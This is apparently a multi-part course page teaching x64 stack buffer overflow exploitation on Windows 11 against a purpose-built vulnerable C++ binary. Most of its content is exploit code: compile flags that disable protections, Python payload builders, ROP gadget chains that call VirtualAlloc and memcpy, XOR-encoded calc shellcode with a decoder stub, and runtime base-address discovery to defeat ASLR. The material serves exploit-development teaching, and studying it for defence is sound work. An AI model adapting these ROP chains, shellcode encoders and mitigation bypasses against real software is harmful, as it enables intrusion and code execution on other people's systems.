BOF
g3tsyst3m // course material

Buffer Overflows
in the Modern Era

A ground-up guide to x64 stack-based buffer overflows on Windows 11 24H2 — from debugger fundamentals through ROP chain construction, shellcode encoding, DEP/ASLR bypass, and a fully working exploit against a real vulnerable binary.

Windows 11 24H2 x64 Architecture ROP Chains Python Exploit Dev DEP + ASLR Bypass
Part 1 Debugger & Setup
Part 2 First Overflow
Part 3 ROP Chains + VirtualAlloc
Part 4 Shellcode + memcpy
Part 5 ASLR Bypass
01
Part One

Environment Setup & x64dbg Fundamentals

// Disabling protections, compiling the target, and manually controlling RIP

Learning Objectives

  • Disable Windows 11 Core Isolation and Exploit Protection for controlled learning
  • Compile the vulnerable binary with stack protections disabled using MinGW-w64
  • Navigate x64dbg — set breakpoints, step through instructions, inspect registers and stack
  • Manually redirect RIP to an unreachable function using the debugger
  • Understand why x64 buffer overflows use ROP rather than JMP RSP

The Challenge — x64 on Windows 11

Stack-based buffer overflows on x64 Windows 11 are a fundamentally different problem from the x86 exploits that filled offensive security courses for the past two decades. DEP is always-on at the hardware level. ASLR randomizes module base addresses every boot. Stack canaries are the default in modern compilers. The techniques that worked in 2010 crash immediately on a fully patched Windows 11 24H2 machine.

This series was born from a personal challenge: successfully exploit a buffer overflow on the latest fully-patched Windows 11, bypassing all modern mitigations. The answer is Return Oriented Programming (ROP) — reusing the program's existing instructions rather than injecting new code. This module sets up the environment and teaches the debugger before we touch any exploit code.

Step 1 — Disable Windows Protections for Learning

Before building the exploit we need a controlled environment. Parts 1–4 deliberately disable Windows security features so we can learn the core mechanics without fighting multiple protections at once. Part 5 re-enables everything and demonstrates ASLR bypass. This is the correct pedagogical order — learn the technique cleanly first, then add complexity.

Two locations to toggle off in Windows Security:

Step 2 — The Vulnerable Binary

The target binary is purpose-built for this series. It includes several intentional design choices that make it exploitable and also provide the primitives we'll need for the full exploit chain:

C++ overflow.cpp — the vulnerable target binary
// overflow.cpp — g3tsyst3m // Intentionally vulnerable binary for the buffer overflow series // Compile: x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static #include <windows.h> #include <iostream> #include <cstring> // win_function() is intentionally never called by main() // Goal: demonstrate controlling RIP by redirecting execution here void win_function() { std::cout << "You have successfully exploited the program!\n"; system("calc.exe"); } void vulnerable_function() { char buffer[275]; // 275-byte buffer — no bounds checking std::cout << "Enter some input: "; std::cin >> buffer; // UNSAFE: stops at whitespace, no length limit } int main() { // VirtualAlloc intentionally imported and called here so it appears // in the binary's import table — we'll resolve its address via x64dbg // and use it as a ROP chain target in later parts LPVOID mem = VirtualAlloc(NULL, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (mem) printf("Memory allocated at %p\n", mem); std::cout << "Welcome to the vulnerable program!\n"; vulnerable_function(); std::cout << "Goodbye!\n"; return 0; }

Compile Flags — What Each Does and Why It Matters

Shell Compile command with explanation
x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static # -fno-stack-protector # Disables stack canaries. Without this, GCC inserts a random value # between the buffer and the saved return address. If the canary is # overwritten, the program terminates before RIP can be hijacked. # With this flag: we can overwrite the return address freely. # -no-pie # Disables Position Independent Executable — the compiler's form of ASLR. # A PIE binary loads at a random base address every run, making static # addresses in ROP chains invalid. With -no-pie: binary loads at a fixed # base (0x140000000), so our gadget addresses are stable across runs. # NOTE: We re-enable ASLR in Part 5 and solve it programmatically. # -static # Links all libraries statically into the binary. This includes memcpy # and VirtualAlloc in the binary itself, giving us known, stable addresses # for both APIs without depending on DLL load order.

02
Part Two

The First Real Buffer Overflow — Controlling RIP with Python

// 296 bytes of junk, one struct.pack, and a calculator

Learning Objectives

  • Determine the exact byte offset needed to reach the return address (296 bytes)
  • Use Python's subprocess and struct modules to craft and deliver a buffer overflow payload
  • Attach x64dbg to a running process and verify stack control
  • Observe how the overflow reaches the return address without placing it directly in RIP

Finding the Offset — 296 Bytes

The buffer is declared as char buffer[275] but the overflow needs 296 bytes to reach the saved return address on the stack. The extra 21 bytes account for the function's stack frame overhead — saved registers, alignment padding, and the gap between the buffer start and the saved RIP location. Finding this value typically involves sending increasing amounts of data until the stack shows control at the return address position, or using a cyclic pattern tool like pwndbg's cyclic function.

Having written the vulnerable program ourselves gives the shortcut of knowing the buffer is 275 bytes — adding 20–30 bytes to find the exact offset is quick empirical work.

Python overflow_part2.py — first working buffer overflow redirecting to win_function()
# overflow_part2.py — g3tsyst3m Part 2 # Sends 296 bytes of junk followed by the address of win_function() # win_function() is at 0x14000158C — confirmed in x64dbg symbols view import struct import subprocess # 296 bytes fills the buffer AND overwrites up to the saved return address junk = 296 payload = b"\x41" * junk # Append the address of win_function() in little-endian 64-bit format # struct.pack("<Q", addr) = 8 bytes, little-endian unsigned 64-bit # 0x14000158C is the address INSIDE win_function after stack alignment setup # (not the very first instruction — skip past the stack alignment prologue) payload += struct.pack("<Q", 0x14000158C) process = subprocess.Popen( ["C:/path/to/overflow.exe"], # update to your path stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE ) # Pause to allow attaching x64dbg before sending payload input("Attach overflow.exe to x64dbg, then press Enter...") stdout, stderr = process.communicate(input=payload) print(stdout.decode()) if stderr: print(stderr.decode())

Why We Don't See the Address in RIP

A common point of confusion for developers coming from x86: after the overflow, the address of win_function() does not appear in the RIP register. Instead, you'll see other registers (like RSP-relative values) showing 0x41414141 fill from the junk bytes. The overflow address is on the stack, waiting to be popped into RIP when the next RET instruction executes.

This is the fundamental shift from x86 thinking to x64 ROP thinking: stop watching RIP, watch the stack. RIP is just executing whatever the current RET pops. The attack surface is the stack contents, not RIP's current value.


03
Part Three

ROP Chains — Building the VirtualAlloc Call

// Hunting gadgets, setting registers, defeating DEP without touching the stack

Learning Objectives

  • Use Ropper and ROPgadget to enumerate available gadgets in the vulnerable binary
  • Construct a ROP chain to set RCX, RDX, R8, and R9 for a VirtualAlloc call
  • Understand why some registers (R8, R9) require creative multi-gadget chains
  • Find the address of a specific constant value in memory using x64dbg's memory search
  • Chain gadgets to execute VirtualAlloc and allocate RWX memory for shellcode

What Are ROP Gadgets?

ROP (Return Oriented Programming) gadgets are short instruction sequences already present in the binary's executable sections, each ending with a RET instruction. Because they already exist in executable memory, DEP doesn't prevent their execution. By chaining their addresses on the stack, we control what code executes simply by controlling where each RET goes.

The goal here is to call VirtualAlloc(NULL, 1024, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) entirely through ROP — no shellcode, no executable stack. We need to set four registers to specific values:

Python VirtualAlloc register requirements — what we need to build
# VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) # Windows x64 calling convention: RCX, RDX, R8, R9 RCX = 0x00000000 # lpAddress = NULL (OS chooses the address) RDX = 0x000003E8 # dwSize = 1000 (bytes — enough for shellcode) R8 = 0x00003000 # flAllocationType = MEM_COMMIT | MEM_RESERVE R9 = 0x00000040 # flProtect = PAGE_EXECUTE_READWRITE

Finding Gadgets — Ropper and ROPgadget

Shell Dump all gadgets to text files for manual review
# Ropper — dumps all gadgets with their addresses ropper -f overflow.exe >> ropgadgets_ropper.txt # ROPgadget — alternative tool, useful for cross-validation py ROPgadget.py --binary overflow.exe >> ropgadgets_rop.txt # Both tools produce the same gadgets — use whichever you prefer # Search the output file for patterns like: # grep "pop rax; ret" ropgadgets_ropper.txt # grep "xor ecx, ecx" ropgadgets_ropper.txt # grep "mov r8" ropgadgets_ropper.txt

Setting RCX = 0 (Easy)

The XOR ecx, ecx pattern — the canonical null-free zeroing technique — is the simplest register setup. Writing to ECX (32-bit) zero-extends into RCX (64-bit), so a single gadget is enough:

Python RCX gadget — xor ecx, ecx; mov rax, r9; ret
# Found via: grep "xor ecx" ropgadgets_ropper.txt # The "mov rax, r9" side effect is acceptable — we don't care about RAX here payload += struct.pack("<Q", 0x14000276f) # xor ecx, ecx; mov rax, r9; ret; # RCX = 0 ✓

Setting RDX = 1002 (Moderate)

No direct mov rdx, 1000 gadget exists. The creative solution: find a pop rax; ret gadget, load the memory address where 0x1000 is stored in the binary (found via memory search in x64dbg), dereference it into RAX, then add it to EDX. The result is 1002 (2 + 1000) — more than enough allocation size:

Python RDX gadget chain — creative multi-gadget value construction
# Memory search trick: in x64dbg, Memory Map → search for value 0x1000 # First result: address 0x1400000AC contains the DWORD value 0x1000 # We'll pop this address into RAX, then dereference it to get 1000 into RAX payload += struct.pack("<Q", 0x140001f8c) # pop rax; ret; ← pops next value off stack into RAX payload += struct.pack("<Q", 0x140001f8c) # pop rax; ret; ← RAX now = 0x140001f8c (addr of next gadget) payload += struct.pack("<Q", 0x140001243) # mov edx, 2; xor ecx, ecx; call rax; ← EDX=2, ECX=0, calls pop rax again payload += struct.pack("<Q", 0x140001f8c) # pop rax; ret; ← pops next value into RAX payload += struct.pack("<Q", 0x1400000AC) # VALUE: this is the ADDRESS where 0x1000 lives in memory payload += struct.pack("<Q", 0x140007678) # mov eax, dword ptr [rax]; ret; ← dereference: RAX = 1000 payload += struct.pack("<Q", 0x140006995) # add edx, eax; mov eax, edx; ret; ← EDX = 2 + 1000 = 1002 ✓

Setting R8 = 0x3000 and R9 = 0x40 (Hard)

R8 and R9 are the most used sparingly in the binary's code, meaning few gadgets directly manipulate them. The solution involves routing values through RAX and RBX as intermediaries. R9 in particular is "hated" — it requires a gadget that also includes add rsp, 0x48, which advances the stack pointer by 72 bytes, requiring NOP sled padding in the chain to compensate:

Python R9 gadget chain — the painful one (add rsp,48 requires NOP padding)
# R9 = 0x40 (PAGE_EXECUTE_READWRITE) # Strategy: load 0x40 into RAX via memory dereference, move RAX→RBX, # then use the only available "mov r9, rbx" gadget — which unfortunately # also includes "add rsp, 0x48" that skips 72 bytes ahead on the stack. # Compensate by padding 72+32=104 bytes of NOPs after the gadget address. payload += struct.pack("<Q", 0x140001f8c) # pop rax; ret; payload += struct.pack("<Q", 0x140000018) # address where 0x40 lives in the binary payload += struct.pack("<Q", 0x140007678) # mov eax, dword ptr [rax]; ret; ← RAX = 0x40 payload += struct.pack("<Q", 0x140001b58) # push rax; pop rbx; pop rsi; pop rdi; ret; ← RBX = 0x40 (pops 2 extra values) payload += b"\x90" * 16 # padding for the 2 extra pops (rsi, rdi) payload += struct.pack("<Q", 0x140007CA5) # mov r9, rbx; [...]; add rsp,0x48; pop rbx/rsi/rdi/rbp; ret; # ↑ this gadget moves RSP forward 0x48 (72) bytes # and then pops rbx+rsi+rdi+rbp (32 more bytes) # total: 104 bytes of stack we need to pad over payload += b"\x90" * 72 # compensate for add rsp, 0x48 payload += b"\x90" * 32 # compensate for pop rbx/rsi/rdi/rbp # R9 = 0x40 ✓ (finally)

04
Part Four

Shellcode Encoding, memcpy Chain & Full Exploit

// XOR encoding + decoder stub + memcpy ROP = working shellcode execution

Learning Objectives

  • Understand why std::cin requires encoding — bad characters that break payload delivery
  • XOR-encode shellcode with key 0xAC and embed a self-decoding stub
  • Build a ROP chain to call memcpy and copy shellcode from stack to the VirtualAlloc'd region
  • Understand the NOP sled's role in the final payload layout
  • Assemble the complete exploit: shellcode + padding + ROP chain for VirtualAlloc + memcpy

The Bad Character Problem

std::cin >> buffer stops reading at whitespace characters (0x20, 0x09, 0x0A, 0x0D) and null bytes (0x00). This means any shellcode or ROP gadget address containing these bytes will truncate the payload. The solution is XOR encoding: transform every byte so none of the problematic values appear in the payload, then include a decoder stub that restores the original bytes at runtime before execution.

XOR Encoding with Key 0xAC

The key 0xAC was chosen because XOR-ing the shellcode bytes with it produces no bad characters. The encoded payload is safe to send through std::cin. At runtime, the decoder stub XORs each byte back with 0xAC to restore the original shellcode before jumping to it.

Python xor_encoder.py — encode shellcode with key 0xAC to remove bad characters
# The raw calc.exe shellcode (207 bytes, no nulls — from the shellcoding module) # This is the IAT-walking WinExec shellcode targeting "calc.exe" shellcode = b"\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b" shellcode += b"\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89" # ... (full 207-byte shellcode) xor_key = 0xAC # chosen: avoids bad chars (0x00, 0x20, 0x09, 0x0A, 0x0D) encoded = bytearray() for byte in shellcode: encoded.append(byte ^ xor_key) # Verify: no bad chars in the encoded output bad_chars = [0x00, 0x20, 0x09, 0x0a, 0x0d] for b in encoded: if b in bad_chars: print(f"BAD CHAR FOUND: 0x{b:02x}") print(f"Encoded: {encoded.hex()}") print(f"Length: {len(encoded)} bytes")

The Decoder Stub

The decoder stub is a small assembly routine prepended to the encoded shellcode. It XORs each byte back with the key at runtime, restoring the original shellcode in-place before jumping to it. This stub must itself be written in bytes that are safe to deliver — no bad characters in the stub encoding either.

x64 Assembly decoder_stub.asm — XOR decoder prepended to encoded shellcode
; decoder_stub — g3tsyst3m Part 4 ; Prepended to the XOR-encoded shellcode. Decodes in-place at runtime. ; Bad-char free: no 0x00, 0x20, 0x09, 0x0A, 0x0D in the assembled bytes. xor rcx, rcx ; RCX = 0 (loop counter) lea rsi, [rip + FFFFFFFFFEBFDE09h] ; null-free way to build shellcode base address add esi, 02222222h ; adjust RSI to point to encoded shellcode start mov rbx, rsi ; RBX = base (save for later jump) lea rsi, [rsi] ; RSI = pointer to current byte mov cl, 0CFh ; RCX = length of encoded shellcode (207 bytes) mov al, 0ACh ; AL = XOR key (0xAC) decode_loop: xor byte ptr [rsi], al ; XOR one byte: decode it inc rsi ; advance pointer dec rcx ; decrement counter jne decode_loop ; repeat until all bytes decoded ; fall through to decoded shellcode (starts immediately after this stub)

memcpy ROP Chain — Copying Shellcode Off the Stack

After VirtualAlloc returns (the allocated address is in RAX), we chain into memcpy to copy the encoded shellcode from the stack into the RWX region. memcpy uses RCX (dst), RDX (src), R8 (size). The destination is the VirtualAlloc'd address (returned in RAX after the VirtualAlloc call). Source is the stack address where our shellcode sits. Size is 251 bytes (decoder stub + encoded shellcode).

Python Final payload layout — complete exploit structure
# Complete payload structure for Part 4 (no ASLR) # All addresses use 0x140000000 base (fixed, ASLR disabled) # ─── SECTION 1: NOP sled + Decoder stub + Encoded shellcode ───────────────── # This goes at the START of the payload so it lands on the stack # The ROP chain will use memcpy to COPY this section to the VirtualAlloc'd region payload = b"\x90" * 8 # NOP sled (8 bytes) payload += decoder_stub # XOR decoder (35 bytes) payload += encoded_shellcode # encoded calc shellcode (207 bytes) # total so far: 250 bytes of shellcode # ─── SECTION 2: Padding to reach return address ────────────────────────────── payload += b"\x41" * 45 # 45 bytes to reach offset 296 # ─── SECTION 3: ROP chain ──────────────────────────────────────────────────── # R9 gadgets (0x40 = PAGE_EXECUTE_READWRITE) — set first because chain is longest payload += struct.pack("<Q", 0x140001f8c) # pop rax; ret; payload += struct.pack("<Q", 0x140000018) # addr of 0x40 payload += struct.pack("<Q", 0x140007678) # mov eax,[rax]; ret; payload += struct.pack("<Q", 0x140001b58) # push rax; pop rbx; pop rsi; pop rdi; ret; payload += b"\x90" * 16 # compensate rsi/rdi pops payload += struct.pack("<Q", 0x140007CA5) # mov r9,rbx; [add rsp,48]; pop rbx/rsi/rdi/rbp; ret; payload += b"\x90" * (72+32) # compensate add rsp,48 + 4 extra pops # R8 gadgets (0x3000 = MEM_COMMIT|MEM_RESERVE) # ... (R8 chain — see Part 3) # RCX = 0 (lpAddress = NULL) payload += struct.pack("<Q", 0x14000276f) # xor ecx, ecx; mov rax, r9; ret; # RDX = 1002 (dwSize) # ... (RDX chain — see Part 3) # Call VirtualAlloc! payload += struct.pack("<Q", 0x140001f8c) # pop rax; ret; payload += struct.pack("<Q", 0x140007D78) # VirtualAlloc import address payload += struct.pack("<Q", 0x140001fb3) # jmp qword ptr [rax]; ← CALL VirtualAlloc ✓ # ─── SECTION 4: memcpy ROP chain ────────────────────────────────────────────── # After VirtualAlloc: RAX = new RWX memory address # memcpy(dst=RAX, src=stack_ptr_to_shellcode, size=251) # RCX=dst, RDX=src, R8=size # ... (memcpy chain) # ─── SECTION 5: Jump to decoded shellcode ───────────────────────────────────── # After memcpy: RAX = VirtualAlloc'd region (contains our decoded shellcode) # Jump to it! payload += struct.pack("<Q", 0x14000192f) # jmp rax; ← execute shellcode in RWX region ✓

05
Part Five

Defeating ASLR — Runtime Base Address Discovery

// Re-enable everything. Now bypass it.

Learning Objectives

  • Understand exactly what ASLR randomizes — and what it doesn't
  • Use Python's psutil and ctypes to programmatically retrieve the base address of a running process
  • Calculate dynamic ROP gadget addresses by adding fixed offsets to the runtime base
  • Re-enable all Windows 11 security features and run the full working exploit

Re-Enable All Protections — The Real Challenge Begins

For Part 5, re-enable everything that was disabled for Parts 1–4:

  • Core Isolation (all options including Memory Integrity)
  • Exploit Protection (DEP, ASLR, SEHOP, all system settings)
  • Secure Boot (verify in BIOS/UEFI settings)

With everything re-enabled, the Part 4 exploit fails immediately — the hardcoded 0x140001f8c addresses are now wrong because ASLR has randomized the binary's base address. The fix is straightforward: stop hardcoding addresses and discover them at runtime.

What ASLR Actually Randomizes

The key insight that makes ASLR bypassable here: ASLR randomizes the base address (the first half of the address), but the offset within the module (the second half) remains constant. A gadget at 0x140001f8c with ASLR disabled becomes, say, 0x00d8001f8c with ASLR enabled — only the upper portion changed. The 1f8c offset is always the same relative to the module base.

This means all our ROP gadget addresses can be expressed as base_addr + offset. We just need to discover base_addr at runtime, and we can reconstruct every gadget address dynamically.

Python get_base_address.py — runtime module base discovery via EnumProcessModulesEx
# get_base_address.py — g3tsyst3m Part 5 # Discovers the runtime base address of overflow4.exe using Win32 API # Requires: pip install psutil import ctypes import psutil import subprocess def get_pid_by_name(process_name): for proc in psutil.process_iter(attrs=['pid', 'name']): if proc.info['name'].lower() == process_name.lower(): return proc.info['pid'] return None def get_base_address(pid): PROCESS_QUERY_INFORMATION = 0x0400 PROCESS_VM_READ = 0x0010 h_process = ctypes.windll.kernel32.OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid ) if not h_process: return None h_modules = (ctypes.c_void_p * 1024)() needed = ctypes.c_ulong() if ctypes.windll.psapi.EnumProcessModulesEx( h_process, ctypes.byref(h_modules), ctypes.sizeof(h_modules), ctypes.byref(needed), 0x03 ): base = h_modules[0] # first module = main executable ctypes.windll.kernel32.CloseHandle(h_process) return base ctypes.windll.kernel32.CloseHandle(h_process) return None # Launch the vulnerable binary process = subprocess.Popen(["./overflow4.exe"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) pid = get_pid_by_name("overflow4.exe") if pid: base_addr = get_base_address(pid) print(f"[+] Base address: {hex(base_addr)}") # Now use base_addr + static_offset for every ROP gadget: # payload += struct.pack("<Q", base_addr + 0x1f8c) # pop rax; ret; # payload += struct.pack("<Q", base_addr + 0x276f) # xor ecx, ecx; ret; # ... etc for all gadgets

Converting Static Addresses to Dynamic

The only change to the Part 4 exploit is replacing every hardcoded 0x14000XXXX address with base_addr + 0xXXXX. The offsets (the last four hex digits) never change regardless of ASLR. With base_addr discovered at runtime, every ROP gadget is recalculated correctly for the current run.

Python Dynamic gadget addresses — before vs after ASLR bypass
# BEFORE (Parts 1-4, ASLR disabled) — hardcoded base 0x140000000: payload += struct.pack("<Q", 0x140001f8c) # pop rax; ret; payload += struct.pack("<Q", 0x14000276f) # xor ecx, ecx; mov rax, r9; ret; payload += struct.pack("<Q", 0x140007678) # mov eax, dword ptr [rax]; ret; payload += struct.pack("<Q", 0x140007D78) # VirtualAlloc import address # AFTER (Part 5, ASLR enabled) — base_addr discovered at runtime: payload += struct.pack("<Q", base_addr+0x1f8c) # pop rax; ret; [same gadget, dynamic base] payload += struct.pack("<Q", base_addr+0x276f) # xor ecx, ecx; mov rax, r9; ret; payload += struct.pack("<Q", base_addr+0x7678) # mov eax, dword ptr [rax]; ret; payload += struct.pack("<Q", base_addr+0xD288) # VirtualAlloc import address # The offset values (0x1f8c, 0x276f, etc.) are IDENTICAL. # Only the base changes. That's all ASLR bypass requires in this context.
Series Complete. You've gone from debugger basics through ROP chain construction, DEP bypass via VirtualAlloc+memcpy, shellcode XOR encoding with a self-decoding stub, and finally full ASLR bypass with runtime base address discovery — all on a fully patched Windows 11 24H2 machine. Vulnerable binary downloads: overflow-static.zip and overflow4.zip linked in the blog posts.